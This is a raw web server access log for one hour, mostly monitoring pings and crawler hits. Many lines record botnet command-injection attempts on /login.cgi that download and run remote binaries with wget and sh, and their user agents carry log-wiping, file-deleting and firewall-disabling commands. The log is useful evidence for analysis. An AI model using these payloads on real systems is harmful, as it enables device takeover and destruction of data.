156.220.142.242 - - [01/Nov/2018:22:00:46 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
14.225.3.37 - - [01/Nov/2018:22:00:55 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.133.207/bins/gemini.mips%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:01:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.48.250.78 - - [01/Nov/2018:22:02:15 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:02:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.166.35.173 - - [01/Nov/2018:22:02:57 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:03:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.102.22.159 - - [01/Nov/2018:22:03:48 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:04:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:05:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:06:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.148.134.228 - - [01/Nov/2018:22:06:38 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:07:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.177.218.141 - - [01/Nov/2018:22:07:41 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:08:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:09:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:10:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.119.86.41 - - [01/Nov/2018:22:11:19 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:22:11:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.32.184.210 - - [01/Nov/2018:22:11:45 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
91.106.90.122 - - [01/Nov/2018:22:12:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:22:12:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.208.109.82 - - [01/Nov/2018:22:13:13 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
217.61.96.201 - - [01/Nov/2018:22:13:17 +0100] "GET /caiTianXiaLoginWeb/app/home HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.0.20) Gecko/20140123 Firefox/36.0"
212.91.246.72 - - [01/Nov/2018:22:13:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:14:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.54.53.233 - - [01/Nov/2018:22:14:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
189.79.6.8 - - [01/Nov/2018:22:14:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:22:15:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.198.213.99 - - [01/Nov/2018:22:15:58 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:16:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:17:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.209.195.174 - - [01/Nov/2018:22:17:48 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
165.16.37.150 - - [01/Nov/2018:22:17:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:22:18:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.177.50.228 - - [01/Nov/2018:22:18:41 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:19:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:20:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:21:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.32.227.76 - - [01/Nov/2018:22:22:14 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:22:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
40.77.167.84 - - [01/Nov/2018:22:22:58 +0100] "GET /informationen/faq HTTP/1.1" 404 332 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
212.91.246.72 - - [01/Nov/2018:22:23:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
217.128.15.81 - - [01/Nov/2018:22:23:26 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:22:24:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:25:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.32.184.210 - - [01/Nov/2018:22:26:16 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
217.61.96.201 - - [01/Nov/2018:22:26:18 +0100] "GET /caiTianXiaLoginWeb/app/home HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.0.20) Gecko/20140123 Firefox/36.0"
212.91.246.72 - - [01/Nov/2018:22:26:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:27:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:28:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:29:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.108.66.176 - - [01/Nov/2018:22:30:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Nov/2018:22:30:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:31:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.48.156.135 - - [01/Nov/2018:22:32:08 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:32:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:33:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:34:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
101.140.137.69 - - [01/Nov/2018:22:34:43 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
217.61.96.201 - - [01/Nov/2018:22:35:06 +0100] "GET /caiTianXiaLoginWeb/app/home HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.0.20) Gecko/20140123 Firefox/36.0"
206.189.108.21 - - [01/Nov/2018:22:35:13 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.24.5/hakai.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.24.5/hakai.mipsel -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.24.5/hakai.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:35:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.173.154.248 - - [01/Nov/2018:22:35:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2018:22:36:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:37:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:38:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.43.251.46 - - [01/Nov/2018:22:38:46 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
213.219.38.179 - - [01/Nov/2018:22:38:51 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2018:22:39:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:40:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.177.218.141 - - [01/Nov/2018:22:41:15 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:41:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:42:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:43:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.133.149.90 - - [01/Nov/2018:22:43:30 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:44:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:45:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.226.38.203 - - [01/Nov/2018:22:45:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:22:46:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.1.64.28 - - [01/Nov/2018:22:47:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:22:47:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:48:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.85.149.250 - - [01/Nov/2018:22:49:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:22:49:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.197.238.166 - - [01/Nov/2018:22:49:37 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
79.129.104.43 - - [01/Nov/2018:22:50:15 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 329 "-" "LMAO/2.0"
212.91.246.72 - - [01/Nov/2018:22:50:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
14.43.217.135 - - [01/Nov/2018:22:50:40 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.33.165/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:22:51:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:52:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
40.81.74.67 - - [01/Nov/2018:22:53:18 +0100] "\x03" 501 316 "-" "-"
91.187.223.177 - - [01/Nov/2018:22:53:22 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:22:53:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:54:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:55:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:56:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:57:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:22:58:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.101.169.3 - - [01/Nov/2018:22:59:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)"
212.91.246.72 - - [01/Nov/2018:22:59:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.16.154.27 - - [01/Nov/2018:22:59:49 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:23:00:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
